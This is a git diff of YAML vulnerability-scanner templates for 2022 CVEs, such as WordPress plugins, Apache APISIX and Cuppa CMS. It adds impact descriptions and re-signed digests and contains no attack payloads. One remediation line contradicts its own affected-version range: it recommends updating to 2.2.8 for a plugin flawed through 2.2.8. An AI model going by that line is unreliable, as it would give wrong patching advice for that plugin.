@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100eb0ec79ba17a39b84eb7c3a0b9ee3dd7214536fd755ec615e14d6eb8d3fc25850221008e1280fd2c5d4eebb748714041018e5f8ec0df9c9d72848229c173cb32b0b570:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d0045947981d6ffbd88f83fd1e8af50f2e99c2a55f2cab3193cfbe371e3269e02207a637eba25e86f92508c5f36bcdf401d4c9fa1ceecf8e3c601f5f24ea2feb0b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml
index bbbf090786..266df0ae38 100644
--- a/http/cves/2022/CVE-2022-2314.yaml
+++ b/http/cves/2022/CVE-2022-2314.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
   remediation: |
     Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205e0174e32d04b04c71fc13765e538bd4ca0f67f758ee058670f1f5a5c69df631022003819f60f069153a1e43602effc2a564a79e82a1d49a2b06165e6cb90b3e0a24:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022053992ef8c3565293fe7e18b013e2f2bf5d6c235c3112d9b08643fd77c1145813022077367fb28cf7cf52ee5f03f01f6c3eced1a8aeb9111266cf10f86a07cca11bb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml
index 22f18f5d24..4fb4cc0cb9 100644
--- a/http/cves/2022/CVE-2022-23178.yaml
+++ b/http/cves/2022/CVE-2022-23178.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
+  impact: |
+    An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device.
   remediation: |
     Update the Crestron Device firmware to the latest version to mitigate the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210099ee69409020b614bb5930a4c2dc53839679d7b75038cefe972ecfd00f612caf02206086def07e914e34a5c584c065ed4806f10cd40fa9d7646cef9f34fbccbb973a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203f3105727b65fbdbad8db649a0f546833a1230744bb4e4a6d4909eb6d53b12bb02206fcccba427d002b2bc2ec93722e896e34d5141a8b1e4f131903b02fb246cfef3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml
index a7ba5ffdc5..d506effc72 100644
--- a/http/cves/2022/CVE-2022-23347.yaml
+++ b/http/cves/2022/CVE-2022-23347.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022073f843d047d920b94a822ff13fc41ef4276f565fdc7e5dc0ede51e81501197c1022100ae47e2b26987cb4561964375781746ae8fbd1c87c47bacae1242332ed859436d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022057c734083f2d20725c19e439ceedde3a7681009cc759b094fd7ec2805288f82502210099f33e2212ee2cd35dd5899a54b4b46e01b1cf1adb37c1de5975b430f7dae6ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml
index 5a8342bd40..e1160aaf44 100644
--- a/http/cves/2022/CVE-2022-23544.yaml
+++ b/http/cves/2022/CVE-2022-23544.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
+  impact: |
+    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e7e414a653402cabada53500f599da5287a7c57a56767f478b124e124221810c02206f04f452e99915df7a92e4376b226c14d85a965a91208e7229aa1a97ddcbdb20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a05d937b0a1cf08062c8c95f6f48896fcacc09f71af259fe5fe3f5f4a3f77dd1022100cc8a772ce5c5ee3255501bf64dd2c124d1be09bc2d5b3ee24e4d0512ef8c6375:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml
index 686dea7543..f03cadc7ce 100644
--- a/http/cves/2022/CVE-2022-2373.yaml
+++ b/http/cves/2022/CVE-2022-2373.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: |
     Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100885a110593ab9ac017308f516cfdb97a024135a5f3c747e48faa5c3e1462f9cc0221009d0e8409ed4f17f8cd1ceecadf2107fcae83a70e14a011502b714412ed5afe23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d46f7e3574064e0abec782592b27b825d06d999c26a0dba2b31a633dc6157b5f022100ed2dddf38a8fbcd54dd927a6bce9207594cacfcc13e40f6735845f943122c8d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml
index d9cdb7d9b4..8f8f316ebf 100644
--- a/http/cves/2022/CVE-2022-2376.yaml
+++ b/http/cves/2022/CVE-2022-2376.yaml
@@ -5,6 +5,8 @@ info:
   author: Random-Robbie
   severity: medium
   description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
+  impact: |
+    An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.
   remediation: Fixed in version 7.3.1.
   reference:
     - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e8d7863d8c88631468581ae5eddb11d400200e959dc1b729f9b7f29e67857a9902210091ef7d9cf09026f5334b83e1ba3915e8074b6af842d0c8da8b44374ac1ae24c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022072a14653041f6a94f8b8068e9d3133351d864252bbb64a77cbce1bf5b2cafc31022039c17c9143658116780b7f43442fe8196c952e5830401483721aec0aeaa934e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml
index aa0c5bb940..2ce845faa3 100644
--- a/http/cves/2022/CVE-2022-23779.yaml
+++ b/http/cves/2022/CVE-2022-23779.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
+  impact: |
+    An attacker could use the disclosed internal hostnames to plan targeted attacks, gain unauthorized access, or perform reconnaissance on the internal network.
   remediation: |
     Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
         regex:
           - 'https?:\/\/(.*):'
         part: location
-# digest: 4b0a00483046022100a0bc7cd719a940c43809549449a4db80a447ad692ed2846647ca5cd91b088f38022100dec59b8faaffccfbed86673ba14fa41403941b1825fb66289d9ed40d166dd7f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a0ccd258135897d4c9301f3978b0ac6a22363b7bedad4646ec2a9a4266dc45e4022100cab86a5b100ed7976eb5caed35a2bc09b2a7d15dcbba07c2f87f2f7e29857520:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml
index 29f882b6c0..7c053c18be 100644
--- a/http/cves/2022/CVE-2022-2379.yaml
+++ b/http/cves/2022/CVE-2022-2379.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number.
+  impact: |
+    An attacker can gain access to sensitive student information, potentially compromising their privacy and security.
   remediation: |
     Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201f97fb2a2c67334643979ffe3d7eab1dccae8e3fa8285c0e8ce4c4b57d62f65a022100e545c324a1b7b8452710837799cbffcda2dded7f699f92187698ce19af550364:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bdb93a60b3225b0a0566f06a2bc6acc0eca6a2f9d23a66e85aeba94ee7ddb9cd022100944bf4ee572a63ee6142e128e0302cc4c49a8e34e4dfb1f2562231b69b7c7a2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml
index 575dca7317..4f45e7f754 100644
--- a/http/cves/2022/CVE-2022-23808.yaml
+++ b/http/cves/2022/CVE-2022-23808.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong,daffainfo
   severity: medium
   description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e9b5d6baf3d87ce84c52464732deb034bd67aa19bcfb3185c7173a61bbb601d6022100f6e393129eb0fe8112cd6b2e6638adebafaf880a1297c3708985f40fcc900920:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200d72b87e902f69e651b4e81449eb5b12e8a8e179cc9874c99b51e620ef4e71770220180c7d24053100654a9478cda68fac7f66f722f7db7c1a07d423ccd81c554046:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml
index 18fbd8a26e..eb4bd558d6 100644
--- a/http/cves/2022/CVE-2022-2383.yaml
+++ b/http/cves/2022/CVE-2022-2383.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dd61b96cf6f2257417f9f2e40ab89300b7d969dd82e8ec20bb9692b87b7d5b1b022100a17872c95b770605b4379b5c57953744528c445705192b939a09610c68e0cea3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b8775e50144fd83bb1eb1f8ea7d6638bd8badff9a5cd72cbca9998a565f797e022100ee7be9d221ee1bb46f1a4e38c73dfedb96d8e28ecde3e0d0f7068102d164a3be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml
index 24290fc844..0083bd491e 100644
--- a/http/cves/2022/CVE-2022-23854.yaml
+++ b/http/cves/2022/CVE-2022-23854.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
+  impact: |
+    An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.
   remediation: |
     Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207684a9f27cb9dc2f9a88a6764a4f047e1468f0bd50c409d11c6d4ae0f256a957022058f8ecd342b1ad98fe9e03daf543936e84685caec38248d5d45e849e01aeb308:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fce3543a643d22db41e37543e5f2cc4af61d513e9270655f080d44a8809a8a16022100b5e077edf9dff1e50fde80afd95881362a32ca2108c84c40bd57845c52dbd7fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml
index efa6e96092..251369c767 100644
--- a/http/cves/2022/CVE-2022-23881.yaml
+++ b/http/cves/2022/CVE-2022-23881.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a0047304502201437fb753d9ac82c5d3b98b82beb182a3b569aada131ba1dd5b2ffc67f0f0925022100bce7f0ae6fa2f7af5e4ee0ce73637dd0c1abf23ccced38a62f49719c5ee33b23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022079ac9f591d2a0d559a2d4865e897f54f886bd9e33eb34cd8c0ab69028c3f8f5702205104cc12451dbf7c155ed44c10f3922e826cf0349b9e5f5698bccdb0592f8764:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml
index b928b0fdf5..467b88aab0 100644
--- a/http/cves/2022/CVE-2022-23898.yaml
+++ b/http/cves/2022/CVE-2022-23898.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5.
   reference:
@@ -45,4 +47,4 @@ http:
         part: body
         words:
           - 'c8c605999f3d8352d7bb792cf3fdb25'
-# digest: 4a0a004730450221009db5287401374e30a19d5617b33e879d70c06d8d95165c8da658fd45959513dd022074535c23218e53f92fd6991830b0a28ce96aeb5aea64cad1476f78dfccc1d646:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022074d6d44988178f2149396d666fc893d08fb87f70c37c4167cf8cf52d1f25ea19022100f322e66017ec7c20c17c4132b459c805e7660e31469fbcff6ae1475a43421f20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml
index 179bf7196f..c46ba719fc 100644
--- a/http/cves/2022/CVE-2022-23944.yaml
+++ b/http/cves/2022/CVE-2022-23944.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuakilong
   severity: critical
   description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel.
   remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
   reference:
     - https://github.com/apache/incubator-shenyu/pull/2462
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210087cf81fd8289e8d48886b3ec26633ab077a92efcf464d03f96da118317de33f502203e060e315eb53f9d7cff798bd7c09c4e7934f75d11f0418e14807c6ee2498862:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b0d97d6f725af8e5ff26256cbebab5abcc592ee3158f5d357e2b483c521ac00102210087368cc17b440b08e9c0d211253568816980d50843dc804841ca669fac63bd1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml
index 3b297bc47e..9f0ccd17f3 100644
--- a/http/cves/2022/CVE-2022-24112.yaml
+++ b/http/cves/2022/CVE-2022-24112.yaml
@@ -5,6 +5,8 @@ info:
   author: Mr-xn
   severity: critical
   description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
   reference:
     - https://www.openwall.com/lists/oss-security/2022/02/11/3
@@ -81,4 +83,4 @@ http:
         regex:
           - GET \/([a-z-]+) HTTP
         part: interactsh_request
-# digest: 490a0046304402204eed9964272c5e5907ea1670ca9dedeeaddaa825831f7fae5ddbbee6860355d202207f1666a5b7a973be8cfea62eee1cd9bb118d77e1cdfa0c17252e1aab799610c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100af235aa5d07b7233d0259cb3a44d7675dc67892f2ec6d43bd245f1fa13f598fc022100c9efdfc9cbf6e30eed4794f78e6c0460fcf30e98c55d39fdb2b65ec94a50209e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml
index a12359a42f..fc459fd340 100644
--- a/http/cves/2022/CVE-2022-24124.yaml
+++ b/http/cves/2022/CVE-2022-24124.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: high
   description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200ff7b039aefb44ce60c26c1235d1c1c01b6e5cc1c670647b8e1dec8e2dbb53e402206e77448bc20ea703eebfc5ed755b547465d9affedbd30d4b091d962cf45c906a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210093e1a9f053fd0d441ee017d34eb4820aed2c9722cd8f9895b9c4bd890fd7121302207e1f323dc50084b3965eec2ccda409fece1243d62b8d5ed8ac922f45bad057a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml
index 80ea6eafe0..d3b8306b47 100644
--- a/http/cves/2022/CVE-2022-24129.yaml
+++ b/http/cves/2022/CVE-2022-24129.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.
+  impact: |
+    An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure.
   remediation: |
     Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
         part: interactsh_request
         words:
           - "ShibbolethIdp"
-# digest: 490a0046304402202e75f6e1c9bde2d79a98ef22cee084bf981775ad8d967e16bb6a41b096905d3602206f48b088f17bca0a4fe75309cc56510e4d5ab411a692d565b7fa7820c2585a96:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d0e8851f4f949ccdd16c7c8b6d273dc19f3a8d7f2911004b7e00890f9ba7c0580220133be450b9ba3327b1e4569782e9ca95f7470f271e9284f5e1ba252beeb64520:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml
index dd40b2751f..58d0db538e 100644
--- a/http/cves/2022/CVE-2022-2414.yaml
+++ b/http/cves/2022/CVE-2022-2414.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
   remediation: |
     Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4b0a0048304602210099ec10c2f07896a777af83d8c894c2455a4626864789ad0cdc8556495e71283e022100cad057037e9ee30426c77b34bd8114915f61ed072392ca8a123ddef97daf54a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fbc796f2531746e7865ff03e01eec1bf7ceb3464187b44a9f6b95c137a20485e02210099e10143c5dd0d070b54fc9db8a2e2c600b4711377bf5aec7c3e45186f39691e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml
index 701e22191a..fabb605236 100644
--- a/http/cves/2022/CVE-2022-24181.yaml
+++ b/http/cves/2022/CVE-2022-24181.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ac1bbba4e06087784b59ccfb8d9758c14492ad956dcba74e45c7bce511e9ffe502210091633150051313b050d00af3fce8d3457073717d0b1c39c92296eea832cd7d69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200cea1c8a7a6849067b269f21a9f5382aa99f449d8e13923e168c191a1ed6e7410220311261345e3a97816d999f6575587aafebe66a257025f9f727da0d309c56331f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml
index d57cb683df..f99ac388f7 100644
--- a/http/cves/2022/CVE-2022-24223.yaml
+++ b/http/cves/2022/CVE-2022-24223.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version Atom CMS v2.1
   reference:
     - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
@@ -43,4 +45,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")'
         condition: and
-# digest: 490a004630440220064a4db44b8223f6b20896d22c3d06003083ea6fb3583ec6f759ed6a1b4db63902201c347e3c44a05bcc417f04cc68ee6d90840e48dc139bfea21d4f6e2eec74c671:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203d4f945e9160382960c8290013d3a801a5abfe97273774b713986ede67741094022100e381fde628806be9b9d1d641c4b02fd012ec1c137963f292e2e77f9c6702cc1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml
index b35c1d7c58..0add656668 100644
--- a/http/cves/2022/CVE-2022-24260.yaml
+++ b/http/cves/2022/CVE-2022-24260.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: kval
         kval:
           - PHPSESSID
-# digest: 4a0a00473045022062da07486e48a2e0371f7073aab447d61c8c17b65b9c62657f902214877892a9022100e139df99615f979446b24784406c61074d000860051d7c22780ae9092ff83f6c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205c242e4c9f0cffa836165c8730b81e2f59e5e5b1d65131e0f7a384b1894b62e602203c866766a00815c3b7f2e073da0400f0abe74d8a96019fc13c91409ffb339376:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml
index dd9ccf5819..c7fbce3f84 100644
--- a/http/cves/2022/CVE-2022-24264.yaml
+++ b/http/cves/2022/CVE-2022-24264.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
   remediation: |
     Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bf7ad7bf062b3ab2896f7fba61d350db931b9a5226853c1ef61eeeef0a50f1eb02207f929f6dc0ad974074a6f961de91c2efbdf63e1c7eea09def41afbd233356a4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206eca9f07661bd6368f69c5dcb849ee3343b1d170f40a759fd8e802577a47f3ac02206880c5a33589969780b20a586167470dd03532b68dd68435adc25f94fe084c43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml
index 09b717fef9..41237dea11 100644
--- a/http/cves/2022/CVE-2022-24265.yaml
+++ b/http/cves/2022/CVE-2022-24265.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
   remediation: |
